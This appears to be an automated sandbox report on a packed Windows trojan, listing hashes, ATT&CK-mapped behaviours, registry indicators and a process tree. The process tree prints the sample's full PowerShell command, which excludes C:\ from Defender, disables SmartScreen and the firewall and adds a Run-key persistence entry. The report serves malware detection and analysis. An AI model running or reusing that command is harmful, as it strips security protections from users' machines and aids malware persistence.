550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80

General

Target

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Size

3.5MB
MD5

57324b12506033d137a0ad82d2499c81
SHA1

6664dda28b289251ab23f16f7955f97978208fa7
SHA256

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80
SHA512

d514ff8dda74f4af8645ab950b3ff6bd4e0a9432b9614a9fef4953a56b2bbd6535556ef9b6129df1099b7c93cafb682ad50db773ea6bc7db48279165b67fe2d1

Score

10^/10

evasion persistence themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

powershell.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" powershell.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

1016 netsh.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"	powershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

pid	process
1016	netsh.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/3920-130-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp	themida
behavioral2/memory/3920-131-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp	themida
behavioral2/memory/3920-132-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp	themida
behavioral2/memory/3920-133-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp	themida
behavioral2/memory/3920-135-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp	themida
behavioral2/memory/3920-142-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe"	powershell.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

pid process

3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1484 3920 WerFault.exe 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

pid	process
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

pid	pid_target	process	target process
1484	3920	WerFault.exe	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exe550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

pid	process
3460	powershell.exe
3460	powershell.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3460 powershell.exe
Token: SeBackupPrivilege 3460 powershell.exe

description	pid	process
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeBackupPrivilege	3460	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exepowershell.exe

description	pid	process	target process
PID 3920 wrote to memory of 3460	3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe	powershell.exe
PID 3920 wrote to memory of 3460	3920	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe	powershell.exe
PID 3460 wrote to memory of 1016	3460	powershell.exe	netsh.exe
PID 3460 wrote to memory of 1016	3460	powershell.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
"C:\Users\Admin\AppData\Local\Temp\550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
2⤵
- Modifies security service
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3460

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
3⤵
- Modifies Windows Firewall
PID:1016

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3920 -s 2004
2⤵
- Program crash
PID:1484

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 3920 -ip 3920
1⤵
PID:1140

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Virtualization/Sandbox Evasion

1

T1497

Credential Access

Discovery

Query Registry

3

T1012

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1016-140-0x0000000000000000-mapping.dmp

Download
memory/3460-137-0x0000000000000000-mapping.dmp

Download
memory/3460-141-0x00007FFF745E0000-0x00007FFF750A1000-memory.dmp

Filesize
10.8MB

Download
memory/3460-139-0x00007FFF745E0000-0x00007FFF750A1000-memory.dmp

Filesize
10.8MB

Download
memory/3460-138-0x0000024CB00C0000-0x0000024CB00E2000-memory.dmp

Filesize
136KB

Download
memory/3920-133-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp

Filesize
9.4MB

Download
memory/3920-136-0x00007FFF92DD0000-0x00007FFF92FC5000-memory.dmp

Filesize
2.0MB

Download
memory/3920-135-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp

Filesize
9.4MB

Download
memory/3920-134-0x00007FFF92DD0000-0x00007FFF92FC5000-memory.dmp

Filesize
2.0MB

Download
memory/3920-130-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp

Filesize
9.4MB

Download
memory/3920-132-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp

Filesize
9.4MB

Download
memory/3920-131-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp

Filesize
9.4MB

Download
memory/3920-142-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp

Filesize
9.4MB

Download
memory/3920-143-0x00007FFF92DD0000-0x00007FFF92FC5000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads